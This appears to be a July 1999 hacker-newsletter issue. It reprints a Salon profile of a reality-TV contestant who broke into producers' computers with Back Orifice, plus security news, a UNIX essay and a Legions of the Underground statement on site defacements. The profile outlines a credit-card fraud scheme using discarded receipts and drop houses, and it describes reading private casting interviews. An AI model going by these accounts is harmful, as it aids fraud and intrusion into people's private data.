And yet, as Ingersoll admits: "We did have a period of time when we went through dumpsters. But hell, the kids had more fun! Every dumpster we passed by, they'd want to stop and go through it!"

The Ingersolls' marriage disintegrated in the late '80s. After bearing seven children, Abe's mother "switched teams," as Abe puts it. She and her partner got custody of the younger children, including Abe. He lived with his mother in De Kalb, Ill., but after a round of family counseling, he relocated to his father's home in Peoria, where he lived from 1994 to 1997.

Abe was 12 when he first discovered computers, specifically a Toshiba laptop that his dad brought home, which was running an old version of DOS. Abe was a natural with computers. "I picked up the Toshiba, fired up Procomm Plus, and that was the end of it," he says. He started with dial-ups to local bulletin board systems. When a local ISP hooked up its T-1 line in late 1994, Abe discovered the Internet. "Of course I was their first customer," he says.

With no money to buy better computer equipment, and under the influence of older hacker buddies he met while noodling around online, Abe soon dived into deeper waters. Using discarded credit-card receipts, he started ordering computer equipment from pay phones, having the merchandise overnighted to vacant houses. Before the shippers discovered the scam, he was long gone with the booty. Eventually, his older brother Chase ratted Abe out to his father, who turned his son in to the police. Abe confessed all. He was slapped with 18 months of probation and several hundred dollars in fines.

After this incident, Abe's father was ready for him to move on. An uncle on his mother's side agreed to serve as Abe's new mentor and guardian. Abe relocated to Los Angeles, entered high school, dithered, dropped out by pulling what he calls "the Ferris Bueller trick" (back-dooring into the school's computers and wiping clean all records of himself). Abe was free, but he felt like he was missing out on something. So he figured he should cap his adolescence with a lunge at TV stardom. He decided to tough out the arduous "Road Rules" casting process -- which begins with 5,000 applicants -- to try to land a spot on the show.

What Abe got into was, of course, a real-life variation on "EDtv," in which everyone's existence is quasi-scripted by unseen hands. "The big mindfuck of it all is that they control everything," Abe says of Bunim and Murray. "From how much money you have to where you're going to what you're doing. You have this set of parameters you have to work within to, like, 'have fun.' You're on 'The Truman Show.' You just happen to know it."

"Basically you saw how mundane and silly a lot of it was," says Abe. "These two burned-out soap opera producers are now doing a show for MTV. They take thousands of hours of tape and make it into -- whatever you call it. It's pretty much a joke." (For the record: Bunim is a former soap opera producer; Murray came out of news and documentary production.)

If Bunim and Murray were shocked that Abe hacked their system, the first line of Abe's application questionnaire should have been their first clue. Asked to "Describe your job," Abe wrote: "Full time systems analyst (aka punk hacker kid)." Bunim and Murray eventually lifted Abe's "punk hacker" wording for his cast bio on the Road Rules Web site. But they just didn't get it. Abe wasn't being cute with the hacking boast. He was being honest.

The casting process started with a homemade tape in which Abe introduced himself to the producers and proved that he looked sharp on camera. A lengthy and repetitive series of interviews followed; they were conducted mostly by phone, but a few were held in the company's Van Nuys offices. It was during one of those sessions that an interviewer challenged him about the possibility of hacking the office computers.

"They said, 'So, Abe, what have you seen in our computer system?' I just laughed because at that point I hadn't spent any time at all investigating stuff. I don't know if they didn't think it could happen or what. But when they offhandedly made a remark, it kind of stuck in my mind. Then I got bored one night and the next thing you know ..."

He quickly discovered a significant security flaw in the Bunim/Murray network -- namely, that it had no security. The company was running various incarnations of Windows, which, according to Abe, contained gaping holes. Abe doesn't hang out or correspond much with the hacker community -- "I'm not a typical hacker!" he insists -- but he does read "bug reports," in which hackers list the flaws they've discovered in software programs and operating systems. Drawing on that information and several hours of trial and error, Abe found a point of entry.

Then he made a quick stop at Cult of the Dead Cow, an active hacker site, where he downloaded a copy of Back Orifice, a "remote control" program that allows someone like Abe to operate a Windows 95 machine from any location via the Internet. With that capability, he was able to navigate the network and uncover a huge storehouse of Bunim/Murray documents and files. Most of it was eye-glazing stuff -- Excel spreadsheets, legalistic internal memos and other mulch he didn't care about. "It's like a vast empty void," he says.

But he also found inside dope: transcripts of casting interviews, meticulous logs of videotapes describing every titter, jitter and palpitation of the characters recorded on tape, story outlines for half-hour episodes distilled from hundreds of hours of film time. This was Abe's pre-show education, his own private screening room. In typical exchanges, people were asked about their problems growing up, about their appetites for sex. One guy is asked if it's true that all men measure their penises. (His answer: I never have.)

"In the interviews they cover this huge range of topics, but what it comes down to is the sex and the conflict," Abe observes. "That's basically what the show revolves around."

Abe is probably right. I search through his archive for something, anything, of deeper interest to mankind, but I come up empty. For me, the sheer banality of it all is the most telling part. But Abe, half my age and far more idealistic, got his hackles up about the manipulative nature of the "Road Rules" experience. For that reason, he felt no compunction about using the information he gathered to take action. But instead of striking back at his Orwellian puppet masters with some sort of brilliant megaprank -- as he easily could have -- Abe used his insider knowledge to bag a babe.

As the Latin America road trip got under way, Abe almost immediately filled the role of black sheep. The show portrayed him as a gadfly and a cad, whose idea of fun is to electronically eavesdrop on another cast member's intimate phone call to a girlfriend back home, while coolly plotting to seduce any female who catches his fancy.

Abe wasn't secretive about his plans. On MTV's Web site, he's quoted reflecting on his experience: "If there was one thing that I was really 18 about, I said that I would get with all three girls ... but in the same respect I'm kind of, you know, what else is a horny young 18-year-old dude gonna do?"

"The degree of that surprised me," says Abe's uncle, Jon Burdick, who guided Abe's move to California. "I knew he'd want to come across as the wild one. But he doesn't ever really mean to hurt anybody and he's surprised when he does. I think it's just the way Bunim/Murray wants to cut it, for the sake of ratings."

Which brings us to the part of Abe's saga that connects his "Road Rules" hack to the now infamous fight with Gladys. While beetling through the casting interviews from "Road Rules: Australia," Abe found interviews with "Susie," an 18-year-old blond from Pittsburgh. What Abe did not know as he perused her personal effusions was that he would encounter Susie during the trip through Latin America.

As one in a series of contrivances known as "missions" ("Go deep sea fishing!" "Fight a bull!"), the producers arranged for the Australia cast to appear and "challenge" the Latin America cast to a jet-ski competition. When Abe glimpsed Susie in her wet suit, he felt an instant connection.

"A new way to meet girls in the '90s!" Abe laughs. "Beat them at their own game. Know them better than they know themselves."

From reading Susie's interview, Abe learned enough to get her attention. "I knew little tidbits. When I met her, it was like, 'Ha ha! I've got information on you!'" Then he made himself seem really cool by telling her about the hack: "Just imagine a girl doing this thing for the show -- and one of the kids on the show knows you work in a video store, and that you got the information off of Bunim/Murray's computer system. That's pretty impressive."

Impressive or not, it worked. Abe and Susie's affair was a highlight of the series. In one shot, we see them strolling through a balmy Mexican evening and smooching under the streetlights.

The next morning, as Abe and his Winnebago-riding mates pack up for the day's adventures, the previous night's activities are, understandably, the talk of the group. Susie has already been spirited away, the Australia cast's mission accomplished. She isn't around to defend her honor.

That's when Gladys loses it. A feisty native of Boston's inner-city Roxbury district, she announces that she didn't like Susie and gets going on a judgmental diatribe directed at Abe and his girlfriend-for-a-night. "She has no class!" Gladys calls Abe a "coward" and, strangely, taunts him for his unwillingness to strike her. Abe lashes back, blasting her as a "psychotic bitch" and a "maniac." Suddenly, Gladys charges him and -- bop! pow! -- she unleashes a flurry of blows that drops Abe, who collapses onto a cot.

The upshot of the fight: Abe throws a fit, not without some justification. He threatens first to call "the federales" and then, more realistically, a lawyer. The Bunim/Murray contract prohibits violence among cast members. Gladys gets a one-way ticket back to her Boston home and Abe serves time as the group pariah, particularly in the eyes of the remaining two female cast members.

Apparently, the resentments lingered well beyond the end of the experience. When asked in January by a New Orleans newspaper to describe Abe, cast member Sarah Martinez dubbed him "the asshole." This was the same Sarah who, not knowing how correct she was, described Abe on the air as "the type of person who'd read your journal." Abe finds that comment offensive. "I never read anybody's journal!" he says, laughing.

The sojourn through Latin America is history, but Abe relived it every Monday night as the episodes aired on MTV. Or at least, he relived an approximation of it. "I talked to one of the other guys in the cast recently," Abe says. "He watches the show and says, 'That's not the trip I remember.'" That's the way Abe feels, too. "I had no idea that I'd be as big of a troublemaker as I ended up being," he confesses. "I expected there'd be people just as bad as me. Or just as interesting."

Abe peruses the alt.tv.road-rules newsgroup and sometimes posts there when the commentary about him gets out of hand. "I'm the one everyone likes to talk shit about," he sighs. But he's also a favorite of female viewers. One e-mail from a young lady -- offering to perform certain favors for him -- is printed out and taped to his door. To better service his fans, Abe has created a Web site, "Abecam," which features live, streamed video of his daily activities.

Abe tells me that he rarely hacks anymore. In the end, it seems he has learned a lesson from "Road Rules," just as the producers had hoped. "It's just a vast empty void out there," he says. "Like looking up somebody's asshole."

salon.com | July 21, 1999

- - - - - - - - - - - -

About the writer
Jonathan Vankin is a freelance journalist in Los Angeles.
@HWA

28.0 This is just silly: BO2Kfun Page Shut Down From Overuse
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by RA

The web site of someone who hosted a screen shot of someone's computer that had been owned with Back Orifice 2000 had to be shut down from overuse. The site was generating one gigabyte of traffic per day.

BO2K Fun
http://www.altern.org/bo2kfun

- nice expression on the poor sap's face though

@HWA

29.0 Man Sentenced for Using Cell Phone
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Neil Whitehouse, 28, was convicted of "recklessly and negligently endangering" a British Airways flight carrying 91 passengers from Madrid to Manchester after he ignored repeated requests from the crew to switch off his cell phone. He was sentenced to one year in jail.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2298512,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Cell time for using cell phone

By Daniel Simpson, Reuters
July 21, 1999 11:28 AM PT

URL:

MANCHESTER, England -- A judge sentenced a British oil worker Wednesday to an unprecedented one year's jail time for endangering an international flight by refusing to switch off his mobile phone.

Neil Whitehouse, 28, was convicted of "recklessly and negligently endangering" a British Airways flight carrying 91 passengers from Madrid to Manchester after he ignored repeated requests from the crew to switch off his phone.

"You had no regard for the alarm that would be caused to passengers by your stubborn and ignorant behavior," Judge Anthony Ensor told Whitehouse at Manchester crown court.
Ensor said the case was the first time anyone had been prosecuted in Britain for using a mobile phone aboard a plane and there was no precedent to guide him on sentencing. As serious as mid-flight violence The sentence should serve as a warning that mobile phone use on planes, which is illegal in Germany and the United States, would be treated as seriously as violence on board aircraft, Ensor said. Both British Airways and the Civil Aviation Authority (CAA), which looks after the interests of all UK carriers, welcomed the landmark ruling as a step in the right direction. "We welcome the fact that the court has recognized the seriousness of the hazard from mobile phones," BA spokesman Jamie Bowden said. Although Whitehouse made no airborne calls, aviation experts told a three-day trial that radio waves from the phone could have sparked an explosion or affected the Boeing 737's navigational systems as it flew at 31,000 feet. "The scientific evidence showed that there was a real possibility of risk," Ensor said. "You were sitting six meters (20 feet) away from 100 pieces of complex electrical equipment," he told Whitehouse. Whitehouse, who was sitting over the aircraft's wing fuel tanks, said he had just been preparing a text message to send on his arrival in Manchester. Despite warnings from the pilot and crew he kept his phone on. Interference no big deal His lawyer argued that any potential interference to the plane's systems would have been only for a few seconds and could have been corrected. Judge Ensor called for urgent new legislation specifically covering mobile phone use on planes following CAA evidence given in the trial. Detective Sergeant Rick Bates of Manchester Airport police agreed action was necessary. "The possible consequences in this case could have been far more serious than from on-board violence. Luckily they weren't but that is no guarantee for the future," he said. 
@HWA

30.0 HILLARY CLINTON AND HACKERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org
by BHZ, Thursday 22nd July 1999 on 12:57 am CET

It seems that someone who doesn't like Hillary Clinton tampered with DNS settings, and forwarded the Hillary Rodham Clinton For U.S. Senate Exploratory Committee site (www.hillary2000.org) to a site that is against her, HillaryNo.com (www.hillaryno.com). It looks like hacking has also become a political weapon. Read the story below.

Hillary Gets Hacked

By James Ledbetter

NEW YORK – Is someone sympathetic to New York City mayor Rudolph Giuliani playing political tricks on Hillary Clinton's Web site? That's the conclusion reached by some staffers working with Hillary Clinton's Senate exploratory committee.

On July 7, Hillary Clinton launched a Web site, www.hillary2000.org, to promote her probable run for the open New York seat in the U.S. Senate. But a number of Web surfers have found the site impossible to reach, because their browsers go automatically to a rival site, www.hillaryno.com, which is maintained by Friends of Giuliani.

An expert in computer hacking, Jerry Irvine, said the likely cause is a partial "DNS poisoning" or "cache poisoning" hack, in which would-be site users are rerouted en masse to a different Web destination.

Drake Franklin, who works for a technology manufacturer based in San Jose, Calif., said that for several consecutive days he was unable to access the official Hillary Clinton site from the computer in his office. Even though he typed in the proper Web address for the official Clinton site, his browser consistently went to the rival site. "I checked with other people in the office, and they get linked to the real Hillary Clinton site, but my computer still seems trapped on the [hillaryno.com] site," Franklin said. He got the same result no matter what browser he used.
Hockaday Donatelli Campaign Solutions, the firm that maintains the Hillaryno.com site, denied any involvement in hacking the rival site and said it was unaware of the maneuver until contacted by a reporter. "This is not a good thing," said Becky Donatelli, cochair of the Virginia-based consulting firm that has built Web sites for a large number of Republican candidates. "I would hate for this to happen to one of our clients." A source from Clinton's camp affirmed that the committee is aware of the glitch. At least three other users from other areas of the country have experienced the same unintended rerouting of their browsers, the Clinton source said, noting that no incidents have been reported in the last few days. The committee could not explain why or how the rerouting occurred. The incident demonstrates that hacking has been added to the menu of dirty tricks available to political candidates, would-be candidates and their allies. Web-site hacking can be especially effective because it is hard to trace. The activity is very likely against the law, said Irvine, director of media and public relations at Infrastructure Defense, a Virginia-based technology-security firm. "To divert individual computers, you would've had to have gotten root access, in order to change the DNS entry," he said. "They would almost have to have committed an illegal act." Irvine added that most such hacks are designed to spread throughout multiple networks, but that this one appears to have affected only one server. Still, that would be enough to divert hundreds of would-be visitors to Hillary2000.org, if the Internet happened to route them through the hacked server at a given moment. The Hillaryno.com site came online in late March, and is marked "Paid for and Copyright 1999 Friends of Giuliani." It labels itself "a Web site dedicated to the notion that we should expect more from someone who aspires to the U.S. Senate. That the U.S. 
Senate is a place for proven leaders, not a proving ground." Although Giuliani has not declared himself a candidate for the Senate seat opened by the retirement of Daniel Patrick Moynihan, he is widely considered to be seeking the Republican nomination.

@HWA

31.0 SAMBA 2.0.5 SECURITY FIXES
~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org
by BHZ, Thursday 22nd July 1999 on 1:05 am CET

Samba 2.0.5 has been released and it fixes a couple of security holes (a denial of service attack on nmbd, a buffer overflow in the message service in smbd and a race condition in smbmnt which would allow a user to mount at arbitrary points in the filesystem). Check out the site - http://www.samba.org.

@HWA

32.0 SECURITY STANDARDS FOR BANKING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org
by BHZ, Thursday 22nd July 1999 on 5:34 am CET

The Banking Industry Technology Secretariat (BITS), a technology consortium of the nation's biggest banks, announced that the main problem holding back online banking and financial services is a lack of standards. Next week they are opening a "security laboratory" which will certify security software for use in the banking business.

@HWA

33.0 What makes UNIX users so smart? (well some of em)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.insecure.org/reading.html

The Elements Of Style: UNIX As Literature

If there's nothing different about UNIX people, how come so many were liberal-arts majors? It's the love of words that makes UNIX stand out.

Thomas Scoville

In the late 1980s, I worked in the advanced R&D arm of the Silicon Valley's regional telephone company. My lab was populated mostly by Ph.D.s and gifted hackers. It was, as you might expect, an all-UNIX shop. The manager of the group was an exception: no advanced degree, no technical credentials. He seemed pointedly self-conscious about it. We suspected he felt (wrongly, we agreed) underconfident of his education and intellect.
One day, a story circulated through the group that confirmed our suspicions: the manager had confided he was indeed intimidated by the intelligence of the group, and was taking steps to remedy the situation. His prescription, though, was unanticipated: "I need to become more of an intellectual," he said. "I'm going to learn UNIX."

Needless to say, we made more than a little fun out of this. I mean, come on: as if UNIX could transform him into a mastermind, like the supplicating scarecrow in "The Wizard of Oz." I uncharitably imagined a variation on the old Charles Atlas ads: "Those senior engineers will never kick sand in my face again."

But part of me was sympathetic: "The boss isn't entirely wrong, is he? There is something different about UNIX people, isn't there?"

In the years since, I've come to recognize what my old manager was getting at. I still think he was misguided, but in retrospect I think his belief was more accurate than I recognized at the time. To be sure, the UNIX community has its own measure of technical parochialism and nerdy tunnel vision, but in my experience there seemed to be a suspicious overrepresentation of polyglots and liberal-arts folks in UNIX shops.

I'll admit my evidence is sketchy and anecdotal. For instance, while banging out a line of shell, with a fellow engineer peering over my shoulder, I might make an intentionally obscure literary reference:

    if test -z `ps -fe | grep whom`
    then
        echo ^G
    fi
    # Let's see for whom the bell tolls.

UNIX colleagues were much more likely to recognize and play in a way I'd never expect in the VMS shops, IBM's big-iron data centers, or DOS ghettos on my consulting beat. Being a liberal-arts type myself (though I cleverly concealed this in my resume), I wondered why this should be true.
My original explanation--UNIX's historical association with university computing environments, like UC Berkeley's--didn't hold up over the years; many of the UNIX-philiacs I met came from schools with small or absent computer science departments. There had to be a connection, but I had no plausible hypothesis. It wasn't until I started regularly asking UNIX refuseniks what they didn't like about UNIX that better explanations emerged. Some of the prevailing dislike had a distinctly populist flavor--people caught a whiff of snobbery about UNIX and regarded it with the same proletarian resentment usually reserved for highbrow institutions like opera or ballet. They had a point: until recently, UNIX was the lingua franca of computing's upper crust. The more harried, practical, and underprivileged of the computing world seemed to object to this aura of privilege. UNIX adepts historically have been a coddled bunch, and tend to be proud of their hard-won knowledge. But these class differences are fading fast in modern computing environments. Now UNIX engineers are more common, and low- or no-cost UNIX variations run on inexpensive hardware. Certainly UNIX folks aren't as coddled in the age of NT. There was a standard litany of more specific criticisms: UNIX is difficult and time-consuming to learn. There are too many things to remember. It's arcane and needlessly complex. But the most recurrent complaint was that it was too text-oriented. People really hated the command line, with all the utilities, obscure flags, and arguments they had to memorize. They hated all the typing. One mislaid character and you had to start over. Interestingly, this complaint came most often from users of the GUI-laden Macintosh or Windows platforms. People who had slaved away on DOS batch scripts or spent their days on character-based terminals of multiuser non-UNIX machines were less likely to express the same grievance. 
Though I understood how people might be put off by having to remember such willfully obscure utility names like cat and grep, I continued to be puzzled at why they resented typing. Then I realized I could connect the complaint with the scores of "intellectual elite" (as my manager described them) in UNIX shops. The common thread was wordsmithing; a suspiciously high proportion of my UNIX colleagues had already developed, in some prior career, a comfort and fluency with text and printed words. They were adept readers and writers, and UNIX played handily to those strengths. UNIX was, in some sense, literature to them. Suddenly the overrepresentation of polyglots, liberal-arts types, and voracious readers in the UNIX community didn't seem so mysterious, and pointed the way to a deeper issue: in a world increasingly dominated by image culture (TV, movies, .jpg files), UNIX remains rooted in the culture of the word. UNIX programmers express themselves in a rich vocabulary of system utilities and command-line arguments, along with a flexible, varied grammar and syntax. For UNIX enthusiasts, the language becomes second nature. Once, I overheard a conversation in a Palo Alto restaurant: "there used to be a shrimp-and-pasta plate here under ten bucks. Let me see...cat menu | grep shrimp | test -lt $10..." though not syntactically correct (and less-than-scintillating conversation), a diner from an NT shop probably couldn't have expressed himself as casually. With UNIX, text--on the command line, STDIN, STDOUT, STDERR--is the primary interface mechanism: UNIX system utilities are a sort of Lego construction set for word-smiths. Pipes and filters connect one utility to the next, text flows invisibly between. Working with a shell, awk/lex derivatives, or the utility set is literally a word dance. 
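The diner's "cat menu | grep shrimp | test -lt $10" is, as the essay says, not valid shell: test reads its arguments, never stdin. As an added example (not from Scoville's essay; the menu, function names and prices are constructed here), the same thought done with real filters, the price comparison moved into awk so that text flows through every stage:

```shell
#!/bin/sh
# Added example, not part of the original essay.
# `test` never reads a pipe, so the "< $10" stage must be a filter that
# consumes the stream; awk is the word-smith's tool for that.
# The menu below is constructed for this example.

MENU='Shrimp and pasta plate ......... $9.50
Garlic shrimp scampi ............ $14.00
Pasta primavera ................. $8.75
Shrimp cocktail ................. $7.25
Grilled salmon .................. $18.50'

# dishes_under KEYWORD MAXPRICE
# Prints every menu line mentioning KEYWORD (case-insensitive) whose
# trailing "$price" is below MAXPRICE. One small utility per stage,
# text flowing invisibly between them.
dishes_under() {
    keyword=$1
    max=$2
    printf '%s\n' "$MENU" \
        | grep -i -- "$keyword" \
        | awk -v max="$max" '
            # the price is the last field, with a leading dollar sign
            { price = $NF; sub(/^\$/, "", price) }
            price + 0 < max + 0
        '
}

# count_under KEYWORD MAXPRICE: number of matching dishes, for scripting
count_under() {
    dishes_under "$1" "$2" | wc -l | tr -d ' '
}

# has_dish_under KEYWORD MAXPRICE: exit status 0 if such a dish exists
has_dish_under() {
    [ "$(count_under "$1" "$2")" -gt 0 ]
}

dishes_under shrimp 10
has_dish_under shrimp 10 && echo "the bell tolls for shrimp under ten bucks"
```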
Working on the command line, hands poised over the keys uninterrupted by frequent reaches for the mouse, is a posture familiar to wordsmiths (especially the really old guys who once worked on teletypes or electric typewriters). It makes some of the same demands as writing an essay. Both require composition skills. Both demand a thorough knowledge of grammar and syntax. Both reward mastery with powerful, compact expression. At the risk of alienating both techies and writers alike, I also suggest that UNIX offers something else prized in literature: a coherence, a consistent style, something writers call a voice. It doesn't take much exposure to UNIX before you realize that the UNIX core was the creation of a very few well-synchronized minds. I've never met Dennis Ritchie, Brian Kernighan, or Ken Thompson, but after a decade and a half on UNIX I imagine I might greet them as friends, knowing something of the shape of their thoughts. You might argue that UNIX is as visually oriented as other OSs. Modern UNIX offerings certainly have their fair share of GUI-based OS interfaces. In practice though, the UNIX core subverts them; they end up serving UNIX's tradition of word culture, not replacing it. Take a look at the console of most UNIX workstations: half the windows you see are terminal emulators with command-line prompts or vi jobs running within. Nowhere is this word/image culture tension better represented than in the contrast between UNIX and NT. When the much-vaunted UNIX-killer arrived a few years ago, backed by the full faith and credit of the Redmond juggernaut, I approached it with an open mind. But NT left me cold. There was something deeply unsatisfying about it. I had that ineffable feeling (apologies to Gertrude Stein) there was no there there. 
Granted, I already knew the major themes of system and network administration from my UNIX days, and I will admit that registry hacking did vex me for a few days, but after my short scramble up the learning curve I looked back at UNIX with the feeling I'd been demoted from a backhoe to a leaf-blower. NT just didn't offer room to move. The one-size-fits-all, point-and-click, we've-already-anticipated-all-your-needs world of NT had me yearning for those obscure command-line flags and man -k. I wanted to craft my own solutions from my own toolbox, not have my ideas slammed into the visually homogenous, prepackaged, Soviet world of Microsoft Foundation Classes. NT was definitely much too close to image culture for my comfort: endless point-and-click graphical dialog boxes, hunting around the screen with the mouse, pop-up after pop-up demanding my attention. The experience was almost exclusively reactive. Every task demanded a GUI-based utility front-end loaded with insidious assumptions about how to visualize (and thus conceptualize) the operation. I couldn't think "outside the box" because everything literally was a box. There was no opportunity for ad hoc consideration of how a task might alternately be performed. I will admit NT made my life easier in some respects. I found myself doing less remembering (names of utilities, command arguments, syntax) and more recognizing (solution components associated with check boxes, radio buttons, and pull-downs). I spent much less time typing. Certainly my right hand spent much more time herding the mouse around the desktop. But after a few months I started to get a tired, desolate feeling, akin to the fatigue I feel after too much channel surfing or videogaming: too much time spent reacting, not enough spent in active analysis and expression. In short, image-culture burnout. The one ray of light that illuminated my tenure in NT environments was the burgeoning popularity of Perl. 
Perl seemed to find its way into NT shops as a CGI solution for Web development, but people quickly recognized its power and adopted it for uses far outside the scope of Web development: system administration, revision control, remote file distribution, network administration. The irony is that Perl itself is a subset of UNIX features condensed into a quick-and-dirty scripting language. In a literary light, if UNIX is the Great Novel, Perl is the Cliffs Notes.

Mastery of UNIX, like mastery of language, offers real freedom. The price of freedom is always dear, but there's no substitute. Personally, I'd rather pay for my freedom than live in a bitmapped, pop-up-happy dungeon like NT. I'm hoping that as IT folks become more seasoned and less impressed by superficial convenience at the expense of real freedom, they will yearn for the kind of freedom and responsibility UNIX allows. When they do, UNIX will be there to fill the need.

Thomas Scoville has been wrestling with UNIX since 1983. He currently works at Expert Support Inc. in Mountain View, CA.

@HWA

34.0 Statement by Legions of the Underground Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Steve

Optiklenz (Steve Skanton) has asked HNN to publish a statement concerning past events involving Legions of the Underground. The statement also comments on the current state of .gov and .mil web page defacements.

Optiklenz's New Statement; July 23rd 1999

Statement of Optiklenz (Steve Stakton), of Legions of the Underground

Something needs to be said...

First off... Earlier this year an assembly of organizations decided to release a joint statement "condemning" Legions. This evidently was before any of them contacted Legions requesting information on what the true plight was. Because of some iniquitous media coverage a few people misunderstood our motives. This of course is in regards to the past "China Human Rights incident".
We wanted to bring a tragic predicament to the surface so other people could speak out as well. The media was misinformed when they reported about our goals to aid these countries in their fight for freedom of speech. They (the media) stated we (Legions) wanted to damage certain computer networks in other parts of the world. We wanted to help them with the situation concerning their lack of freedom and human rights; why would we want to destroy or damage their networks, the same networks that give them what little freedom they have to communicate as people? That just makes no sense at all. I ask that the people who joined to make the statement condemning Legions take that into consideration and next time contact us so that we could discuss things and clear up misunderstandings. It's not a funny matter when people's lives and reputations are at stake.

As hackers, the computer has built our lives, and in turn we have built our lives around the computer; we would never choose to harm such a valuable resource. The term hacker doesn't discriminate. You can be a federal agent, but the best damn coder in the world, and in the sense of the word you'll be a hacker. Bill Gates, a hacker turned billionaire. Software designers, security specialists, the people who help protect your networks: these people are hackers.

"Information and data is to be cherished (for it can only build you, not hurt you), cultivated and developed, not to be annulled or locked up. Hacking is an expansive applied knowledge in any technical field. Destruction and the unschooled acts of those who live without morals are what separates the "hackers" (those whose main purpose of life is to learn, expand, and apply what they learn) from those that go as far as turning the computer on." (-The previous quoted statement was excerpted from Keen Veracity 3 www.underzine.com).

Something serious is going on at the moment. A string of "attacks" against our own government. And till now no one has said anything.
The actions of these groups are sincerely half-witted and absurd, for it will in the end accomplish nothing except a few more long-term jail sentences. The current actions of these self-proclaimed "hackers" have me infuriated. The people DoS'ing government sites, defacing .mil and .gov domains, and damaging information: these people aren't hackers, they are nothing more than unschooled adolescent teens with nothing better on their hands. They are an endangerment to the true aspect of computer science dealt with by the hacker community. Call what they are doing what you want, but don't call it "hacking" because it's not. So many articles have surfaced which referred to what these cracker cults are doing as "hacking", e.g. "Hackers attack government" - "Hackers strike again" (false). Call them destructive, call them by their first name, but for the sake of god don't just yank out the term "hackers" for a better story; for the sake of god don't defile the name "hacker" for your personal gain. A hacker lives by a strong code of ethics. We wouldn't be issuing this statement if we didn't.

A government investigation is currently pending on the above matters. If we don't do something about this now the government will surely hold us accountable, and I'm not talking jail time. We have a lot to lose if we don't stop these people from making us look bad. Though we are not affiliated with them directly, certain mainstream media has left a misleading trail. Some of our rights as computer partisans may be at stake here. With that said I ask that all sites that archive these senseless hacks suspend documenting these fatuous acts for the time being. The script kiddies that go out and target government and military servers are media crazy, and you are only adding fuel to their fire by flashing their work to the public.

A note to the lamers

This is where it ENDS...

In the end it's what you choose to do that makes you who you are.
So make sure what you choose to do doesn't make you look like an ass.

www.hackernews.com/archive/1999/noaa/index.html
www.hackernews.com/archive/1999/army/index.html
www.hackernews.com/archive/1999/monmouth/index.html
www.hackernews.com/archive/1999/argonne/index.html
www.hackernews.com/archive/1999/nswcl/index.html
www.hackernews.com/archive/1999/senate2/index.html
www.hackernews.com/archive/1999/bnl/index.html
www.hackernews.com/archive/1999/doi/index.html

The above is an archive of recent government and military site defacements done by what seems to be comparable to the works of 5 year olds... Look at the archived sites, and tell me something doesn't need to be done.

Just letting people know we aren't going for their childish actions. We don't advocate any of the trash being done by these uninspired idiots.

we're "hackers" the other white meat!

------------------001--------------------------------
the below is an email, and response excerpted from Keen Veracity 4
-----------------------------------------------------

[mail]
Do you still hack?

[response]
Well it depends on your analogue of hacking. By the authentic formalization I "hack" everyday. Whether I'm coding, or doing Network checks it's still hacking. Hacking has little to do with the "illegal" entry of computer systems apart from the Technical, and systematic aspect of it. Illegally accessing a system for no intended reason is not something I advocate or advise performing. What I suggest achieving is going out, and learning, and questioning the system itself before trying to exploit it. And even once you feel you have a broad knowledge of the system make sure you use what you know to build things, and not fuck things up. System admins who are affected by crackers turn to hackers in order to secure their systems. They turn to the philosophies, documents, and programs written by "hackers"... Let's not make them look the other way. We are here, and we are skilled.
What your brain-dead system administrator can do in a week we can accomplish in a matter of minutes, more practically. That's the message that should be put across. One of positivity, not one that says "We're going to take you down." Read my introduction in Keen Veracity 3; I go into greater detail on the subject at hand.

http://www.t00ned.org/optik/kv/kv3.txt

-Steve Stakton

Steve Stakton - optik@shockimaging.com -(optiklenz)
-Head Security Advisor for NACC

Legions Of the Underground - Our title name is not meant to seem dark. Don't get the misconception that we are some sort of cult or only wear black. The computer Underground is a symbol, something that is important, and we treasure its existence, so in its honor we use Legions Of the Underground. We are just a bunch of computer enthusiasts who enjoy working together. Nothing more, nothing less.

HNN Archive for December 19, 1999 - LoU Declares War
http://www.hackernews.com/archive.html?122998.html

HNN Archive for January 7, 1999 - Joint Statement Condemning LoU
http://www.hackernews.com/archive.html?010799.html

Chronological Listing of Past Events
http://www.hackernews.com/archive/louwar/louhist.html

Chronology in Brief from HNN;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The LoU-China-Iraq War Histograph

Below is an attempt to chronicle the events in the LoU-China-Iraq War. We have made every attempt to be accurate. If you have corrections to be made please send us mail.

October 26, 1998
In an attempt to polish its tarnished human-rights image China launches a web site to give their perspective on the issue.
Wired
http://www.wired.com/news/news/politics/story/15831.html

October 27, 1998
Legions of the Underground defaces the Chinese human rights web site that went online the day before.
Wired
http://www.wired.com/news/news/politics/story/15831.html
www.humanrights-china.org
HNN Archive of Hacked Page
http://www.hackernews.com/archive/china1098/ChinaFuckOff.html
HNN Archive for October 28, 1998
http://www.hackernews.com/archive.html?102898.html

December 1, 1998
Bronc Buster, a member of the Legions of the Underground, attacks China's network firewalls.
HNN Archive for December 1, 1998
http://www.hackernews.com/archive.html?120198.html
Wired
http://www.wired.com/news/news/politics/story/16545.html?wnpg=1

December 4, 1998
China charges a software dealer with subversion after supplying western dissidents with 30,000 email addresses.
Wired
http://www.wired.com/news/news/politics/story/16648.html

December 28, 1998
Two Chinese crackers are sentenced to death after cracking a bank computer and wiring 720,000 yuan in non-existent money to their own bank accounts.
CNN
http://www.cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/
Wired
http://www.wired.com/news/news/politics/story/17039.html

December 28, 1998
In an IRC press conference Legions of the Underground declares war on China and Iraq. They call for the complete destruction of all computer systems in both countries. HNN is first to report on the story the following morning.
HNN Archive for December 29, 1998
http://www.hackernews.com/archive.html?122998.html
Edited transcript of IRC Press Conference
http://www.hackernews.com/archive/louwar/louirc.html
Wired
